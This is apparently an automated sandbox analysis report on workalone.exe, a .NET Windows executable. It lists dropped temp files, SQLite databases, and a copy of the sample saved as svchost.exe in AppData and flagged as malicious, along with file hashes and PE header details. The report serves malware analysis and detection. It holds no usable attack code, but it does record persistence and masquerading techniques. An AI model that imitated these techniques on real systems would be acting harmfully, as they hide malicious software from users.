SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\Temp\tmpA760.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\Temp\tmpA790.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\Temp\tmpA7C0.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\Temp\tmpA7F0.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\Temp\tmpA81F.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\Temp\tmpA820.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\Temp\tmpAFBA.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB611.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB641.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE08F.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE6B7.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE939.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\svchost\svchost.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	348672
Entropy (8bit):	5.276672751026678
Encrypted:	false
SSDEEP:	3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
MD5:	68F42F485ECE93306BEF1E4084D3052E
SHA1:	C63F1A56D12A0ACBF5E9A354D8A66C6E17AF2309
SHA-256:	5D526BE000146CF9CF94F7EF6F4E86929D508E17CA483B03D4ECBD2D52E071C9
SHA-512:	75E09E7505039A7EB0D0652666F3ED258D50C2536BB3877C2E1503E69700AAE6A8014EF6B8F4F7F41BFA11F857CF0240F1A950F66395D19AE12707DB863C1242
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@..................................o..J.................................................................................... ............... ..H............text...LP... ...R.................. ..`.rsrc................T..............@..@.reloc...............P..............@..B................,p......H............a..........p.................................................(W....0..U.......~.... ....(t....-.&~....~....(.....(....&..,.&.#.+..+..~.....(....~.....(....sX...z............66.......0..........~Y....:....&sZ....9....&~.....~.... ....(t....:}...&&&~.....~.... ....(t....-l&&&~.....~....~.... ....(t....(.....,M&&&~.......,G&&&.-..9......~.....(....&~....(....&...-.8h...(....8\|...(....+.(....+.(....+.&...,....9#....*.8'.......................0..^........-i~....~...

C:\Users\user\AppData\Roaming\svchost\svchost.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.276672751026678
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	workalone.exe
File size:	348672
MD5:	68f42f485ece93306bef1e4084d3052e
SHA1:	c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
SHA256:	5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
SHA512:	75e09e7505039a7eb0d0652666f3ed258d50c2536bb3877c2e1503e69700aae6a8014ef6b8f4f7f41bfa11f857cf0240f1a950f66395d19ae12707db863c1242
SSDEEP:	3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
TLSH:	747439267384DF26C79223B7C6035BA002184C197785EE76A4E529FC94A1FFAD9CF193
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@................................

File Icon


Icon Hash:	64c68eb2b3b686c4

Static PE Info

General

Entrypoint:	0x427046
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63865450 [Tue Nov 29 18:49:52 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
